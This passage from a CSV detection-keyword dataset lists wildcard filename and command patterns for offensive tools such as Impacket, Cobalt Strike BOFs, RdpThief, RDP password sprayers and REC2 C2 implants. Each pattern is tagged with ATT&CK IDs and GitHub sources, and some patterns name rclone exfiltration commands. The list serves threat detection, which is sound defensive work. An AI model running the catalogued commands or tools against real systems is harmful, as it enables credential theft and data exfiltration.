payloads,T1119,TA0009,N/A,N/A,Collection,https://github.com/,1,1,greyware tool - risks of False positive !,N/A,N/A,N/A,N/A,N/A,N/A -*raw_keylogger.tar.gz*,offensive_tool_keyword,sliver,Sliver 
is an open source cross-platform adversary emulation/red team framework,T1056-001 - T1056-002 - T1056-003 - T1056-004 - T1056-005 - T1003 - T1113 - T1213,TA0006 - TA0009,N/A,N/A,Collection - Credential Access - Exfiltration,https://github.com/trustedsec/SliverKeylogger,1,1,N/A,N/A,2,126,37,2023-09-22T19:39:04Z,2022-06-17T19:32:53Z -*rawrelayserver.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/fortra/impacket,1,1,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rawSHA1_linkedIn_fmt_plug*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z -*rbcd.py -delegate-from * -delegate-to * -dc-ip * -action write *,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*rbcd.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. 
SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*RBCD_Petitpotam_VulnerableServers.txt*,offensive_tool_keyword,WinPwn,Automation for internal Windows Penetrationtest AD-Security,T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035,TA0006 - TA0007 - TA0002 - TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/S3cur3Th1sSh1t/WinPwn,1,1,N/A,N/A,10,2960,495,2023-07-13T14:09:33Z,2018-03-07T12:51:25Z -*rbsec/dnscan*,offensive_tool_keyword,dnscan,dnscan is a python wordlist-based DNS subdomain scanner.,T1595 - T1595.002 - T1018 - T1046,TA0007 - TA0043,N/A,N/A,Reconnaissance,https://github.com/rbsec/dnscan,1,1,N/A,6,10,984,413,2022-08-09T11:11:31Z,2013-03-13T10:42:07Z -*rc4.py *.bin*,offensive_tool_keyword,HadesLdr,Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2,T1055.012 - T1055.001 - T1547.002,TA0005 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/CognisysGroup/HadesLdr,1,0,N/A,10,3,221,33,2023-07-15T21:23:49Z,2023-07-12T11:44:07Z -*RCE-exploits*,offensive_tool_keyword,POC,poc rce - The exploit samples database is a repository for RCE (remote code execution) exploits and Proof-of-Concepts for WINDOWS. 
the samples are uploaded for education purposes for red and blue teams.,T1059.001 - T1210.001 - T1212 - T1055.012,TA0002 - TA0007 - TA0008,N/A,N/A,Exploitation tools,https://github.com/smgorelik/Windows-RCE-exploits,1,1,N/A,N/A,8,731,187,2019-07-29T23:28:15Z,2018-02-13T11:23:40Z -*rclone copy *:*,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,N/A,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*rclone.exe config create remote mega user *,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,N/A,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*rclone.exe* copy *:*,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,N/A,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*rclone.exe* -l * *:*,greyware_tool_keyword,rclone,rclone abused by threat actors for data exfiltration,T1567.002 - T1020 - T1039,TA0010 ,N/A,N/A,Data Exfiltration,https://github.com/rclone/rclone,1,0,interactive mode,6,10,40569,3714,2023-10-03T18:57:28Z,2014-03-16T16:19:57Z -*RDE1-main.zip*,offensive_tool_keyword,RDE1,RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust,T1048.003 - T1567.001 - T1020,TA0011 - TA0010 - TA0040,N/A,N/A,C2,https://github.com/g0h4n/RDE1,1,1,N/A,10,10,30,2,2023-10-02T17:47:11Z,2023-09-25T20:29:08Z -*rdi_net_user.cpp*,offensive_tool_keyword,cobaltstrike,Use windows api to add users which can be used when net is unavailable,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - 
T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/lengjibo/NetUser,1,1,N/A,10,10,410,90,2021-09-29T14:22:09Z,2020-01-09T08:33:27Z -*rdp_check.py*,offensive_tool_keyword,impacket,Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself,T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047,TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011,Operation Wocao,HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound,Lateral movement,https://github.com/SecureAuthCorp/impacket,1,0,N/A,10,10,11786,3291,2023-10-03T20:36:46Z,2015-04-15T14:04:07Z -*rdp_doublepulsar_rce.*,offensive_tool_keyword,metasploit,Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. 
Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/rapid7/metasploit-framework,1,1,N/A,10,10,31309,13502,2023-10-03T21:22:33Z,2011-08-30T06:13:20Z -*RDPassSpray.*.log*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*RDPassSpray.csv*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*RDPassSpray.py*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*RDPassSpray-master*,offensive_tool_keyword,RDPassSpray,Python3 tool to perform password spraying using RDP,T1110.003 - T1059.006 - T1076.001,TA0001 - TA0002 - TA0008,N/A,N/A,Exploitation tools,https://github.com/xFreed0m/RDPassSpray,1,1,N/A,10,6,588,376,2023-08-17T15:09:50Z,2019-06-05T17:10:42Z -*rdpbrute.py*,offensive_tool_keyword,RedTeam_toolkit,Red Team Toolkit is an Open-Source Django Offensive Web-App which is keeping the useful 
offensive tools used in the red-teaming together,T1550 T1555 T1212 T1558,N/A,N/A,N/A,Exploitation tools,https://github.com/signorrayan/RedTeam_toolkit,1,1,N/A,N/A,5,499,114,2023-09-27T04:40:54Z,2021-08-18T08:58:14Z -*RDP-Caching.ps1*,offensive_tool_keyword,AutoRDPwn,AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers,T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002,TA0004 - TA0003 - TA0006 - TA0002 - TA0008,N/A,N/A,Frameworks,https://github.com/JoelGMSec/AutoRDPwn,1,1,N/A,N/A,10,1009,830,2022-09-04T20:44:27Z,2018-07-29T08:22:20Z -*RDPCredentialStealer.zip*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*RDPCredentialStealer-main*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*RDPCredsStealerDLL.*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*RDPCredsStealerDLL.dll*,offensive_tool_keyword,RDPCredentialStealer,RDPCredentialStealer it's a malware that steal credentials provided by users in 
RDP using API Hooking with Detours in C++,T1555.001 - T1059.002 - T1552.002,TA0006 - TA0002 - TA0004,N/A,N/A,Credential Access,https://github.com/S12cybersecurity/RDPCredentialStealer,1,1,N/A,10,2,196,34,2023-06-14T10:25:33Z,2023-06-13T01:30:26Z -*rdphijack.*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*rdphijack.x64*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*rdphijack.x64.*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - 
Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*rdphijack.x86*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*rdphijack.x86.*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation 
tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*RDPHijack-BOF*,offensive_tool_keyword,cobaltstrike,Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,10,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*RDPHijack-BOF*,offensive_tool_keyword,RDPHijack-BOF,BOF - RDPHijack - Cobalt Strike Beacon Object File (BOF) that uses WinStationConnect API to perform local/remote RDP session hijacking.,T1021 - T1021.002 - T1032 - T1055 - T1070 - T1070.006 - T1070.007 - T1574.001,TA0002 - TA0003 - TA0004,N/A,N/A,POST Exploitation tools,https://github.com/netero1010/RDPHijack-BOF,1,1,N/A,N/A,3,257,39,2022-07-08T10:14:32Z,2022-07-08T10:14:07Z -*RDPInception*,offensive_tool_keyword,RDPInception,A proof of concept for the RDP Inception Attack,T1188 - T1214 - T1076 - T1555.003,TA0007 - TA0008 - TA0002,N/A,N/A,Exploitation 
tools,https://github.com/mdsecactivebreach/RDPInception,1,1,N/A,N/A,4,338,677,2017-06-29T16:57:25Z,2017-06-29T10:08:23Z -*rdpscraper*,offensive_tool_keyword,rdpscraper,rdpscraper - Enumerates users based off RDP Screenshots,T1110 - T1189 - T1056.001,TA0006 - TA0008 - TA0011,N/A,N/A,Information Gathering,https://github.com/x90skysn3k/rdpscraper,1,1,N/A,N/A,1,34,15,2023-10-03T21:05:48Z,2017-07-19T17:02:24Z -*RDPSpray*,offensive_tool_keyword,RDPSpray,Tool for password spraying RDP,T1110.001 - T1555.002,TA0006 - TA0040 - TA0003,N/A,N/A,Credential Access,https://github.com/dafthack/RDPSpray,1,1,N/A,N/A,1,89,40,2018-10-12T18:32:51Z,2018-10-12T18:29:52Z -*RdpThief*,offensive_tool_keyword,RdpThief,RdpThief by itself is a standalone DLL that when injected in the mstsc.exe process. will perform API hooking. extract the clear-text credentials and save them to a file. An aggressor script accompanies it. which is responsible for managing the state. monitoring for new processes and injecting the shellcode in mstsc.exe. The DLL has been converted to shellcode using the sRDI project (https://github.com/monoxgas/sRDI). When enabled. RdpThief will get the process list every 5 seconds. search for mstsc.exe. 
and inject to it,T1055 - T1547 - T1059 - T1078,TA0002 - TA0003 - TA0007,N/A,N/A,Credential Access,https://github.com/0x09AL/RdpThief,1,1,N/A,N/A,10,1014,503,2019-11-13T14:13:52Z,2019-11-03T17:54:38Z -*RdpThief.*,offensive_tool_keyword,cobaltstrike,Erebus CobaltStrike post penetration testing plugin,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/DeEpinGh0st/Erebus,1,1,N/A,10,10,1356,214,2021-10-28T06:20:51Z,2019-09-26T09:32:00Z -*rdrleakdiag.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z -*read_cs_teamserver*,offensive_tool_keyword,cobaltstrike,generate CobaltStrike's cross-platform payload,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 
- T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/gloxec/CrossC2,1,1,N/A,10,10,1894,321,2023-08-08T20:02:44Z,2020-01-16T16:39:09Z -*readShellcode*,offensive_tool_keyword,C2 related tools,Thread Stack Spoofing - PoC for an advanced In-Memory evasion technique allowing to better hide injected shellcode's memory allocation from scanners and analysts.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/mgeeky/ThreadStackSpoofer,1,1,N/A,10,10,875,158,2022-06-17T18:06:35Z,2021-09-26T22:48:17Z -*ReadyToPhish.xls*,offensive_tool_keyword,Macrome,An Excel Macro Document Reader/Writer for Red Teamers & 
Analysts. Blog posts describing what this tool actually does can be found https://malware.pizza/2020/05/12/evading-av-with-excel-macros-and-biff8-xls/ and https://malware.pizza/2020/06/19/further-evasion-in-the-forgotten-corners-of-ms-xls/,T1140,TA0005,N/A,N/A,Exploitation tools,https://github.com/michaelweber/Macrome,1,1,N/A,N/A,6,522,83,2022-02-01T16:26:13Z,2020-05-07T22:44:11Z -*RealBey/ThisIsNotRat*,offensive_tool_keyword,ThisIsNotRat,control windows computeur from telegram,T1098 - T1079 - T1105 - T1047 - T1059,TA0010 - TA0009 - TA0002 - TA0005 - TA0011,N/A,N/A,C2,https://github.com/RealBey/ThisIsNotRat,1,1,N/A,9,10,49,18,2023-09-10T07:39:38Z,2023-09-07T14:07:32Z -*realgam3*,offensive_tool_keyword,Github Username,github user Security Researcher @F5Networks hosting reverse tools and other pentester tools for data exfiltration and password attacks,N/A,N/A,N/A,N/A,Exploitation tools,https://github.com/realgam3,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*Real-Passwords*,offensive_tool_keyword,Probable-Wordlists,Password wordlists,T1110 - T1114,TA0006 - TA0007,N/A,N/A,Credential Access,https://github.com/berzerk0/Probable-Wordlists,1,1,N/A,N/A,10,8139,1614,2021-12-21T18:14:59Z,2017-04-16T17:08:27Z -*Reaper.exe kp *,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*Reaper.exe sp *,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. 
This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,0,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*Reaper-main.zip*,offensive_tool_keyword,reaper,Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.,T1547.009 - T1215 - T1129 - T1548.002,TA0002 - TA0003 - TA0040 - TA0005,N/A,N/A,Defense Evasion,https://github.com/MrEmpy/Reaper,1,1,N/A,10,1,61,18,2023-09-22T22:08:12Z,2023-09-21T02:09:48Z -*rebootuser/LinEnum*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,1,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z -*REC2 implant for Mastodon*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*REC2 implant for VirusTotal*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - 
TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2::modules::rec2mastodon*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,0,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2_mastodon_x64.exe*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs written in Rust.,T1105 - T1132 - T1071.001,TA0011 - TA0009 - TA0002,N/A,N/A,C2,https://github.com/g0h4n/REC2,1,1,N/A,10,10,100,9,2023-10-01T18:29:27Z,2023-09-25T20:39:59Z -*rec2_virustotal_x64.exe*,offensive_tool_keyword,REC2 ,REC2 (Rusty External Command and Control) is client and server tool allowing auditor to execute command from VirusTotal and Mastodon APIs 